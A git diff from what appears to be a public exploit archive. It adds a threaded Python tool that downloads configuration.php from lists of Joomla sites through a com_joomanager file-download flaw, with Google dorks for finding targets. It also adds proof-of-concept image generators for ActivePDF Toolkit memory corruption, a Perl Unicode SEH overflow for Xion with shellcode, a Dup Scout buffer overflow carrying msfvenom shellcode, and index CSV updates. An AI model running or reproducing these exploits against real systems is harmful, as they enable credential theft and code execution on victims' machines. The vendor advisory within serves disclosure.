print('') + +print '' +parser = argparse.ArgumentParser(description='JOOMANAGER_Arbitrary_File_Download') +parser.add_argument('-t','--targets', action='store',help='--targets Targets.txt') +args = parser.parse_args() + + + +class Lab_Banners(): + Bulls = ''' + ╭━━━┳╮╱╱╱╱╱╱╱╭╮ + ┃╭━╮┃┃╱╱╱╱╱╱╭╯╰╮ + ┃╰━╯┃╰━┳━━┳━╋╮╭╋━━┳━━┳╮╭╮ + ┃╭━━┫╭╮┃╭╮┃╭╮┫┃┃╭╮┃━━┫╰╯┃ + ┃┃╱╱┃┃┃┃╭╮┃┃┃┃╰┫╭╮┣━━┃┃┃┃ + ╰╯╱╱╰╯╰┻╯╰┻╯╰┻━┻╯╰┻━━┻┻┻╯ + , . ╭╮╱╱╱╱╱╭╮ + /| |\ ┃┃╱╱╱╱╱┃┃ + |-| łαbørαŧøriø Ŧαηŧαsмα |-| ┃┃╱╱╭━━┫╰━╮ + [ "-.____ ____.-" ] ┃┃╱╭┫╭╮┃╭╮┃ + \_ / \ ___.___ / \ _/ ┃╰━╯┃╭╮┃╰╯┃ + "-__[ ===!=== ]__-" ╰━━━┻╯╰┻━━╯ + | | +==========================================================+ + .-"" _|=__ | __=|_ ""-, | COM_JOOMANAGER ARBITRARY FILE DOWNLOAD | + `""" \ "`==´ `==´" / """´ +==========================================================+ + \ \\ // / | [*] GoogleDork: allinurl:index.php?option=com_joomanager | + \ |\___/| / | [*] GoogleDork: allinurl:/component/joomanager/ | + \,;-----;./ | [*] Coded: Luth1er [*] Date: 30 - 06 - 2017 | + | @@ @@ | | [*] GitHub: https://github.com/Luth1er | + \ -"""- / | - I take no responsibilities for the | + `-----´ | - use of this program ! | + +==========================================================+''' +if not args.targets: + os.system('clear') + print Lab_Collors.azul+Lab_Banners.Bulls + print '' + print Lab_Collors.ciano+"[*] Usage: " + print Lab_Collors.branco+"Joomanager_Afd.py --target Targets.txt" + print Lab_Collors.branco+"Joomanager_Afd.py -t Targets.txt" + print '' + exit() + +print Lab_Collors.azul+Lab_Banners.Bulls +slowprint(Lab_Collors.ciano+" Telegram: "+Lab_Collors.purple+"@DreadPirateRobertt") +fastprint(Lab_Collors.ciano+" Telegram: "+Lab_Collors.azul+"t.me/Phantasm_Lab") + + +class COM_JOOMANAGER_ARBITRARY_FILE_DOWNLOAD(threading.Thread): + global Animation, fastprint + def __init__(self, targets): + threading.Thread.__init__(self) + targets = open(targets, 'r').readlines() + self.targets = targets + self.process = None + def run(self): + try: + count = 0 + print '' + Animation("COM_JOOMANAGER_ARBITRARY_FILE_DOWNLOAD", Lab_Collors.verde) + print '' + for target in self.targets: + try: + target = target.strip() + exploit3r = "index.php?option=com_joomanager&controller=details&task=download&path=configuration.php" + exploit_dir = str(target+exploit3r) + try: + path = urlparse.urlparse(target).path + url_title = target.replace(path, "") + title = requests.get(url_title) + except: + title = requests.get(target) + exploit = urllib2.urlopen(exploit_dir) + + soup = BeautifulSoup.BeautifulSoup(title.content.decode('utf-8','ignore')) + Scraping_title = str(soup.title.text) + with open(soup.title.text+".php","wb") as Attatchment: + Attatchment.write(exploit.read()) + print '' + print Lab_Collors.verde+"+==========================+" + print Lab_Collors.verde+"| Exploit Information: |" + print Lab_Collors.verde+"+================================================================================" + print Lab_Collors.purple+"[+] Target: {}".format(Lab_Collors.amarelo+url_title) + print Lab_Collors.purple+"[+] Title: {}".format(Lab_Collors.azul+Scraping_title) + fastprint(Lab_Collors.purple+"[+] Exploited: ========================================================> 100%") + print Lab_Collors.purple+"[+] Server: {}".format(str(Lab_Collors.amarelo+title.headers['server'])) + try: + print Lab_Collors.purple+"[+] Connection: {}".format(Lab_Collors.branco+str(title.headers['Connection'])) + except: + pass + print Lab_Collors.purple+"[+] Exploit: {}".format(Lab_Collors.vermelho+exploit3r) + print Lab_Collors.purple+"[+] Path: "+Lab_Collors.ciano+"/COM_JOOMANAGER-ARBITRARY-FILE-DOWNLOAD/Title.php" + print Lab_Collors.verde+"+================================================================================" + print '' + count = count + 1 + except KeyboardInterrupt: + print("Exiting") + sys.exit(1) + except Exception as Error: + print "Error as {}".format(Error) + pass + Animation("Logout....", Lab_Collors.vermelho) + print Lab_Collors.branco+"[!] Total Exploited: %s" % str(count) + print '' + sys.exit(1) + except KeyboardInterrupt: + print "Exiting...." + sys.exit(1) + +def main(): + try: + threads = 1 + for host in range(int(threads)): + Init_Atck = COM_JOOMANAGER_ARBITRARY_FILE_DOWNLOAD(args.targets) + Init_Atck.daemon=True + Init_Atck.start() + while True: time.sleep(100) + except (KeyboardInterrupt, SystemExit): + print'' + Animation(" Exit Threading....", Lab_Collors.vermelho) + + +if __name__ == '__main__': + try: + main() + except Exception as e: + print "[!] Error as %s" % e + exit() + except KeyboardInterrupt: + fastprint(Lab_Collors.vermelho+"[!] Keyboard as Interrupt....") + exit() \ No newline at end of file diff --git a/exploits/windows/dos/44251.txt b/exploits/windows/dos/44251.txt new file mode 100644 index 000000000..6d84eda02 --- /dev/null +++ b/exploits/windows/dos/44251.txt @@ -0,0 +1,201 @@ +ActivePDF Toolkit < 8.1.0 multiple RCE + +Introduction +============ +The ActivePDF Toolkit is a Windows library which enhances business +processes to stamp, stitch, merge, form-fill, add digital signatures, +barcodes to PDF. Both .NET and native APIs are provided. Amongst many +other operations, this library can be used by applications to transform +images to PDF files. + +Multiple vulnerabilities were identified in the Pictview image processing +library embedded by the Toolkit and signed by ActivePDF. They could allow +remote attackers to compromise applications relying on the Toolkit to +process untrusted images. Note that, while the example instances hereafter +use “exotic” file types, the parser determines the image type from magic +bytes, ignoring file extensions in most cases. + +CVE +=== +CVE-2018-7264 + +Affected versions +================= +ActivePDF Toolkit before 8.1.0 (build 8.1.0.19023) + +Author +====== +François Goichon - Google Security Team + +CVE-2018-7264 +============= +ActivePDF Toolkit < 8.1.0.19023 multiple RCE + +Summary +------- +An image processing library embedded in the ActivePDF Toolkit product is +prone to multiple BSS out-of-bound and signedess errors which can yield +direct EIP control by overwriting function pointers, error handling +structures or IAT entries. Note that the affected library does not enable +ASLR. + +Reproduction +------------ +The following scripts can be used to generate crafted image files which +achieve EIP control when parsed or converted by the ActivePDF Toolkit (e.g. +via the ImageToPDF method), through different root causes. These examples +can be reproduced through both the .NET and native APIs and independently +from file extensions, however the .NET layer will hide the native crashes +and return -1. This may crash the library with a lock on, so only use in +test environments. + +* Interchange File Format (.iff) and derivates +--- +#!/usr/bin/env python2 +# +# eax=28147510 ebx=00009c1c ecx=28147510 edx=00009c1c esi=28140e90 +edi=02930a6c +# eip=41414141 esp=0061f264 ebp=0061f26c iopl=0 nv up ei pl nz na +po nc +# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b +efl=00010202 +# 41414141 ?? ??? + +from struct import pack + +header = "FORMXOXOILBM" + +bodycontents = "AAA" +body = "BODY" + pack(">I", len(bodycontents)) + bodycontents +while (len(body) % 2) == 1: + body += "\x00" + +base = 0x28147510 +payload = pack("I", len(payload)) + payload +while (len(cmap) % 2) == 1: + cmap += "\x00" + +outp = header + cmap + body +assert len(outp) >= 0x28 + +with open("test.iff", "wb") as f: + f.write(outp) +--- + +* Zoner Draw images (.zmf, .zbr) +--- +#!/usr/bin/env python2 +# +# eax=28151110 ebx=0000002e ecx=0000bc28 edx=2813eb10 esi=00000008 +edi=028e0a6c +# eip=41414141 esp=2814550c ebp=41414141 iopl=0 nv up ei ng nz ac +pe cy +# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b +efl=00010297 +# 41414141 ?? ??? + +from struct import pack + +header = pack("IIIIIII", 0x59A66A95, 0x100, 1, 8, 0, 2, 1) + +base = 0x28141504 +payload = "".ljust(0x28151124 - base, "\x00") + pack("I", len(payload)+1) + payload + +with open("test.ras", "wb") as f: + f.write(outp) +--- + +* Truevision Targa images (.bpx) +--- +#!/usr/bin/env python2 +# +#eax=28151110 ebx=00000004 ecx=00000008 edx=2813eb10 esi=00000008 +edi=028f0a6c +#eip=41414141 esp=0061f2a0 ebp=0061f2e8 iopl=0 nv up ei ng nz ac pe +cy +#cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b +efl=00010297 +#41414141 ?? ??? + +from struct import pack + +target = 0x2815112C +payload = "AAAA" + +# TGA / PIC / BPX +base = { 3: 0x28147510, 4: 0x2814550c } +align = None +for al in [3, 4]: + if ((target - base[al]) % al) == 0: + align = al + break +assert align + +header = "\x00\x01\x00" +header += pack("= 8.1.0 (build 8.1.0.19023), which fixes the +problem by removing the affected image processing library. Note that this +also fixes the similar ZDI-16-354 vulnerability. + +For more information and guidance, please contact the ActivePDF support +through their portal (https://support.activepdf.com). + + +Disclosure timeline +=================== +2017/11/28 - Report sent to ActivePDF support +2017/11/28 - Support acknowledges the issue and confirms that the library +is scheduled to be removed from the product +2018/01/29 - Received notification from the ActivePDF support that the +Pictview image processing library had been removed from ActivePDF in build +8.1.0.19023 +2017/02/26 - Public disclosure \ No newline at end of file diff --git a/exploits/windows/local/44243.pl b/exploits/windows/local/44243.pl new file mode 100755 index 000000000..85ee115d2 --- /dev/null +++ b/exploits/windows/local/44243.pl @@ -0,0 +1,177 @@ +#!/usr/bin/perl +# ######################################################################## +# Title: Xion 1.0.125 (.m3u File) Local SEH-based Unicode The “Venetian” Exploit +# Vulnerability Type: Execute Code, Overflow UTF-16LE buffer, Memory corruption +# Date: Feb 18, 2018 +# Author: James Anderson (synthetic) +# Original Advisory: http://www.exploit-db.com/exploits/14517 (hadji samir) Published: 2010-07-31 +# Exploit mitigation: There is no /SAFESEH, SEHOP, /GS, DEP, ASLR +# About: The technique is taken from that paper: Creating Arbitrary Shellcode In Unicode Expanded Strings Chris Anley +# Tested on: Win NT 5.1.2600 EN: Windows XP SP3 Eng Pro, Intel x86-32 +# ######################################################################## +# _ _ _ _ +# ___ _ _ _ __ | |_| |__ ___| |_(_) ___ +# / __| | | | '_ \| __| '_ \ / _ \ __| |/ __| +# \__ \ |_| | | | | |_| | | | __/ |_| | (__ +# |___/\__, |_| |_|\__|_| |_|\___|\__|_|\___| +# |___/ +# +# ######################################################################## + + my $path = "/media/s4/DragonR.m3u"; + + my $buffer_length = 5000; + my $suboffset = 0x104; + my $NOP1 = "\x6F"; # add [edi], ch + my $NOP2 = $NOP1."\x59"; # add [edi], ch # pop ecx + + # [0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Offset to SEH frame + my $crash = "A" x 260; + # [1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Set SEH frame + $crash .= "\x61".$NOP1; # popad # NOP-eq; nSEH; popad puts an address close to the buffer in EAX + $crash .= "\x79\x41"; # pop r32 pop r32 ret; SEh. address for no /SAFESEH / SEHOP, DEP, ASLR + + my $offset_to_payload = length($crash); + + # [2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ settingcode. + # [2.0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ set ecx=2 and eax -> [shellcode] + $crash .= $NOP1; # NOP-eq + $crash .= "\x6a\x59"; # push 0 # pop ecx + $crash .= $NOP1; # NOP-eq + $crash .= "\x41"; # inc ecx + $crash .= "\xCC"; # add ah, cl # eax = eax + 0x100 + $crash .= $NOP1; # NOP-eq + $crash .= "\x41"; # inc ecx + $crash .= "\xC8"; # add al, cl + $crash .= "\xC8"; # add al, cl # eax = eax+2+2;# and as a result: eax = eax + $suboffset(0x104) # EAX -> SC; + + # [2.1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ we're correcting the first BAD character + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x3b\x41"; # mov edx, 41003b00 + $crash .= "\x30"; # add [eax],dh + $crash .= $NOP1; # NOP-eq + + # [2.2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the second byte and the first 00 + $crash .= "\x40"; # inc eax + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\xec\x41"; # mov edx, 4100ec00 + $crash .= "\x30"; # add [eax],dh + + # [2.3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the fourth byte 00. BAD char + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x45\x41"; # mov edx, 41004500 + $crash .= "\x30"; # add [eax],dh + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x46\x41"; # mov edx, 41004600 + $crash .= "\x30"; # add [eax],dh + + # [2.4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x68\x41"; # mov edx, 41006800 + $crash .= "\x30"; # add [eax],dh + + # [2.5] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x78\x41"; # mov edx, 41007800 + $crash .= "\x30"; # add [eax],dh + + # [2.6] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x2F\x41"; # mov edx, 41002F00 + $crash .= "\x30"; # add [eax],dh + + # [2.7] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x63\x41"; # mov edx, 41006300 + $crash .= "\x30"; # add [eax],dh + + # [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x64\x41"; # mov edx, 41006400 + $crash .= "\x30"; # add [eax],dh + + # [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x8d\x41"; # mov edx, 41008d00 + $crash .= "\x30"; # add [eax],dh + + # [2.9] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\xf8\x41"; # mov edx, 4100f800 + $crash .= "\x30"; # add [eax],dh + + # [2.10] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\xb8\x41"; # mov edx, 4100b800 + $crash .= "\x30"; # add [eax],dh + + # [2.11] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x49\x41"; # mov edx, 41004900 + $crash .= "\x30"; # add [eax],dh + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x4A\x41"; # mov edx, 41004A00 + $crash .= "\x30"; # add [eax],dh + + # [2.12] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\x77\x41"; # mov edx, 41007700 + $crash .= "\x30"; # add [eax],dh + + # [2.13] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + $crash .= "\xC8"; # add al, cl # eq eax + 2 + $crash .= $NOP1; # NOP-eq + $crash .= "\xba\xd0\x41"; # mov edx, 4100d000 + $crash .= "\x30"; # add [eax],dh + + # [3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # -4: one more NOP below # -8: sizeof(SEHframe) + # *2: for UTF-16 # /4: 2 for UTF-16 and 2 for the 2-byte-NOP + $crash .= $NOP2 x (($suboffset - 4 - 8 - (length($crash)*2 - $offset_to_payload*2))/4); # NOP-eq + pop ecx + $crash .= $NOP1."\x6A"; # NOP1 + NOP1-eq (push 0) + + + # [4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ shellcode. left - ^jalousie; right - actual shellcode that will be crafted. CMD=cmd.exe +my $shellcode = +"\x50". # "\x8b". # # BAD BYTE + # "\xec". # 0 +"\x55". # "\x55". + # "\x8b". # 0 # BAD BYTE +"\xec". # "\xec". + # "\x68". # 0 +"\x65". # "\x65". + # "\x78". # 0 +"\x65". # "\x65". + # "\x2F". # 0 +"\x68". # "\x68". + # "\x63". # 0 +"\x6d". # "\x6d". + # "\x64". # 0 +"\x2e". # "\x2e". + # "\x8d". # 0 +"\x45". # "\x45". + # "\xf8". # 0 +"\x50". # "\x50". + # "\xb8". # 0 +"\xc7". # "\xc7". + # "\x93". # 0 # BAD BYTE +"\xc2". # "\xc2". + # "\x77". # 0 +"\xff"; # "\xff". + # "\xd0"; # 0 + + $crash .= $shellcode; + + $crash .= "C" x ($buffer_length - length($crash)); + open(myfile, ">$path"); + print myfile $crash; \ No newline at end of file diff --git a/exploits/windows/local/44244.py b/exploits/windows/local/44244.py new file mode 100755 index 000000000..8c1619e87 --- /dev/null +++ b/exploits/windows/local/44244.py @@ -0,0 +1,70 @@ +#!/usr/bin/python + +# +# Exploit Author: bzyo +# Twitter: @bzyo_ +# Exploit Title: Dup Scout Enterprise 10.5.12 - Local Buffer Overflow +# Date: 02-22-2018 +# Vulnerable Software: Dup Scout Enterprise v10.5.12 +# Vendor Homepage: http://www.dupscout.com +# Version: 10.5.12 +# Software Link: http://www.dupscout.com/downloads.html +# Tested On: Windows 7 x86 +# +# bad chars \x00\x0a and everything above \x80 +# +# PoC: +# 1. generate dupscout.txt, copy contents to clipboard +# 2. open app, select Server, select Connect +# 3. type anything into Share Name, paste dupscout.txt contents into User Name +# 4. select Connect and then OK +# 5. pop calc +# + +filename="dupscout.txt" + +junk = "A"*792 + +#0x10021144 : push esp # ret | ascii {PAGE_EXECUTE_READ} [libspg.dll] +eip = "\x44\x11\x02\x10" + +fill = "\x43"*560 + +#msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=ESP -f c +#Payload size: 440 bytes +calc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b" +"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" +"\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6b\x58\x6b\x32\x53\x30" +"\x57\x70\x67\x70\x53\x50\x4e\x69\x39\x75\x54\x71\x39\x50\x61" +"\x74\x6c\x4b\x66\x30\x44\x70\x6c\x4b\x73\x62\x46\x6c\x6e\x6b" +"\x66\x32\x66\x74\x4e\x6b\x62\x52\x65\x78\x44\x4f\x78\x37\x72" +"\x6a\x46\x46\x44\x71\x6b\x4f\x4c\x6c\x57\x4c\x53\x51\x51\x6c" +"\x47\x72\x34\x6c\x47\x50\x69\x51\x6a\x6f\x64\x4d\x37\x71\x59" +"\x57\x6d\x32\x5a\x52\x51\x42\x61\x47\x4e\x6b\x36\x32\x44\x50" +"\x6c\x4b\x73\x7a\x55\x6c\x4c\x4b\x42\x6c\x52\x31\x63\x48\x6d" +"\x33\x32\x68\x43\x31\x5a\x71\x53\x61\x6c\x4b\x36\x39\x31\x30" +"\x73\x31\x4e\x33\x4c\x4b\x50\x49\x65\x48\x39\x73\x46\x5a\x37" +"\x39\x4e\x6b\x64\x74\x4e\x6b\x63\x31\x78\x56\x35\x61\x6b\x4f" +"\x6e\x4c\x39\x51\x7a\x6f\x46\x6d\x63\x31\x4b\x77\x50\x38\x6d" +"\x30\x32\x55\x79\x66\x35\x53\x71\x6d\x78\x78\x57\x4b\x61\x6d" +"\x35\x74\x70\x75\x69\x74\x30\x58\x4c\x4b\x30\x58\x31\x34\x75" +"\x51\x69\x43\x70\x66\x4c\x4b\x44\x4c\x50\x4b\x6c\x4b\x42\x78" +"\x75\x4c\x76\x61\x4e\x33\x4e\x6b\x57\x74\x4e\x6b\x55\x51\x6a" +"\x70\x4d\x59\x67\x34\x67\x54\x77\x54\x63\x6b\x53\x6b\x33\x51" +"\x42\x79\x73\x6a\x33\x61\x69\x6f\x59\x70\x61\x4f\x61\x4f\x42" +"\x7a\x6e\x6b\x34\x52\x58\x6b\x6e\x6d\x61\x4d\x62\x4a\x35\x51" +"\x4c\x4d\x4f\x75\x4f\x42\x73\x30\x33\x30\x63\x30\x46\x30\x42" +"\x48\x45\x61\x6e\x6b\x52\x4f\x4d\x57\x6b\x4f\x4a\x75\x4d\x6b" +"\x4c\x30\x58\x35\x39\x32\x51\x46\x51\x78\x49\x36\x4a\x35\x6f" +"\x4d\x4d\x4d\x59\x6f\x4a\x75\x55\x6c\x54\x46\x31\x6c\x65\x5a" +"\x6d\x50\x59\x6b\x49\x70\x31\x65\x37\x75\x4f\x4b\x73\x77\x62" +"\x33\x62\x52\x52\x4f\x53\x5a\x73\x30\x76\x33\x79\x6f\x68\x55" +"\x62\x43\x70\x61\x42\x4c\x35\x33\x76\x4e\x53\x55\x30\x78\x43" +"\x55\x43\x30\x41\x41") + +buffer = junk + eip + calc + fill + +textfile = open(filename , 'w') +textfile.write(buffer) +textfile.close() \ No newline at end of file diff --git a/exploits/windows/webapps/442321.txt b/exploits/windows/webapps/44241.txt similarity index 100% rename from exploits/windows/webapps/442321.txt rename to exploits/windows/webapps/44241.txt diff --git a/files_exploits.csv b/files_exploits.csv index 4c8084cf1..44dd04c66 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5888,6 +5888,8 @@ id,file,description,date,author,type,platform,port 44235,exploits/macos/dos/44235.c,"Apple macOS Sierra 10.12.1 - 'IOFireWireFamily' FireWire Port Denial of Service",2017-08-19,"Brandon Azad",dos,macos, 44238,exploits/osx/dos/44238.c,"Apple OS X Yosemite - 'flow_divert-heap-overflow' Kernel Panic",2017-01-10,"Brandon Azad",dos,osx, 44236,exploits/macos/dos/44236.c,"Apple macOS Sierra 10.12.3 - 'IOFireWireFamily-null-deref' FireWire Port Denial of Service",2017-08-16,"Brandon Azad",dos,macos, +44247,exploits/multiple/dos/44247.txt,"Suricata < 4.0.4 - IDS Detection Bypass",2018-03-05,"Positive Technologies",dos,multiple, +44251,exploits/windows/dos/44251.txt,"ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions",2018-03-05,"François Goichon",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -9566,6 +9568,9 @@ id,file,description,date,author,type,platform,port 44234,exploits/macos/local/44234.c,"Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak",2017-12-07,"Brandon Azad",local,macos, 44237,exploits/macos/local/44237.md,"Apple macOS Sierra 10.12.1 - 'physmem' Local Privilege Escalation",2017-01-16,"Brandon Azad",local,macos, 44239,exploits/osx/local/44239.md,"Apple OS X 10.10.5 - 'rootsh' Local Privilege Escalation",2016-05-16,"Brandon Azad",local,osx, +44243,exploits/windows/local/44243.pl,"Xion 1.0.125 - '.m3u' Local SEH-Based Unicode Venetian Exploit",2018-03-05,synthetic,local,windows, +44244,exploits/windows/local/44244.py,"Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow",2018-03-05,bzyo,local,windows, +44246,exploits/linux/local/44246.txt,"Sophos UTM 9.410 - 'loginuser' 'confd' Service Privilege Escalation",2018-03-05,KoreLogic,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16292,6 +16297,8 @@ id,file,description,date,author,type,platform,port 44227,exploits/php/remote/44227.php,"Joomla! 3.7 - SQL Injection",2017-07-04,"Manish Tanwar",remote,php, 44228,exploits/php/remote/44228.php,"Posnic Stock Management System - SQL Injection",2017-02-03,"Manish Tanwar",remote,php, 44229,exploits/php/remote/44229.txt,"WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)",2017-10-22,"Manish Tanwar",remote,php, +44242,exploits/android/remote/44242.md,"Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record",2018-02-25,iamrastating,remote,android, +44245,exploits/hardware/remote/44245.rb,"NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -38557,7 +38564,7 @@ id,file,description,date,author,type,platform,port 42585,exploits/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",webapps,php, 42588,exploits/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",webapps,hardware, 42589,exploits/php/webapps/42589.txt,"Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection",2017-08-30,"Ihsan Sencan",webapps,php, -42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - Arbitrary File Download",2017-08-30,"Ihsan Sencan",webapps,php, +42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC)",2017-08-30,"Ihsan Sencan",webapps,php, 42591,exploits/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,webapps,php, 42592,exploits/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",webapps,php, 42595,exploits/php/webapps/42595.txt,"PHP-SecureArea < 2.7 - Multiple Vulnerabilities",2017-08-30,Cryo,webapps,php, @@ -38952,4 +38959,6 @@ id,file,description,date,author,type,platform,port 44216,exploits/perl/webapps/44216.txt,"Routers2 2.24 - Cross-Site Scripting",2018-02-28,"Lorenzo Di Fuccia",webapps,perl, 44219,exploits/hardware/webapps/44219.txt,"D-Link DIR-600M Wireless - Cross-Site Scripting",2018-03-02,"Prasenjit Kanti Paul",webapps,hardware, 44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php, -442321,exploits/windows/webapps/442321.txt,"Parallels Remote Application Server 15.5 - Path Traversal",2018-02-22,"Nicolas Markitanis",webapps,windows, +44241,exploits/windows/webapps/44241.txt,"Parallels Remote Application Server 15.5 - Path Traversal",2018-02-22,"Nicolas Markitanis",webapps,windows, +44250,exploits/php/webapps/44250.txt,"ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection",2018-03-05,"SEC Consult",webapps,php,80 +44252,exploits/php/webapps/44252.py,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download",2017-07-01,Luth1er,webapps,php,